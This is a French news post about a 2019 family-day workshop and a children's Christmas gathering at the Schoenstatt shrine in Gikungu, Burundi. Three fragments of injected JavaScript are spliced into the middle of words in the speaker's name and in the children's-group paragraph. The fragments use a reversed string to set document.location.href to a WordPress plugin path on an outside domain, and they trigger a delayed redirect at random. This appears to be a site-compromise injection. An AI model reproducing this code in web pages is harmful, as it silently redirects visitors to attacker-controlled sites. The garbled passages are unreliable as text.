S’est tenu aujourd’hui le 29 décembre 2019, dans la Salle Polyvalente du Sanctuaire marial de Schoenstatt Mont Sion Gikungu, un atelier dédié à le journée de la famille. Cet atelier était organisé par l’Atelier Ecole de la Foi en collaboration avec la Caritas Burundi, la Maison de l’UNESCO pour la culture de la paix et l’Université du Burundi.

De gauche à droit: Père Longin Ntiranyibagira, Dr Aloys Misago et Pr Atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dolphe Sururu

Trois thèmes ont caractérisés les exposés du jour : La famille, pépinière de la paix et source de développement qui a été présenté par le Dr Aloys Misago ; la communication non-violante dans la famille développé par le Professeur Atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dolphe Sururu et la vision de l’Église par rapport à la famille.

Notre constat a été que tous les exposés ont convergé sur une même idée que toute paix et tout développement commence par la famille.

 

Les enfants de Mukama Menyekana lors de la messe d’action de grâce

Alors que la Salle Polyvalente abritait cet atelier, le Centre Joseph Engling recevait quant à lui les enfants du Groupe Mukama Menyekana. Ce groupe s’est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné pour objectif d’encadrer les enfants pendant les dimanches, précisément lors de l’homélie. Cet encadrement, selon la Secrétaire Exécutive de ce Groupe, Madame Liduine NINTIJE, consiste à expliquer aux enfants de bas âge la parole de Dieu de ce dimanche. Il consiste aussi à leur montrer les bonnes manières d’un enfant chrétien.

Ils étaient rassemblés en ce jour alors pour se souhaiter joyeux Noël et meilleurs vœux du nouvel an 2019. Cette activité a commencé par une messe d’action de grâce qui a été présidée par le Père Herménégilde COYITUNGIYE. Après la messe, ils ont fait une procession vers le Sanctuaire et ils se sont dirigés vers le Centre Joseph Engling où ils ont partagé la joie de Noël et du Nouvel An.

Jean de Dieu NIYONKURU

Laisser un commentaire